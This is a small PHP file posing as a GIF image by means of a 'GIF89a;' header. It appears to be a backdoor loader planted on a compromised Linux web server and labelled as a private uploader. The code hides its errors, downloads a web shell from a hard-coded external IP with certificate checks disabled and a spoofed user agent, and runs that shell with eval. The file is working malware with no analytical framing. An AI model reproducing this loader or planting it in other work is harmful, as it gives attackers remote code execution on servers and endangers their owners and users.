GIF89a;
Priv8 Uploader By InMyMine7
Linux server.abcbiz.in 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
<?php
/* direct */
@error_reporting(0);
@ini_set('display_errors', 0);
$url = 'http://185.128.227.157/ALL-SHELL/raw-ker/alfa.txt';
if(function_exists('curl_init')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$res = curl_exec($ch);
curl_close($ch);
if($res && strlen($res) > 10){
$res = ltrim($res, "\xef\xbb\xbf");
@eval('?>' . $res);
exit;
}
}
echo "active";
?>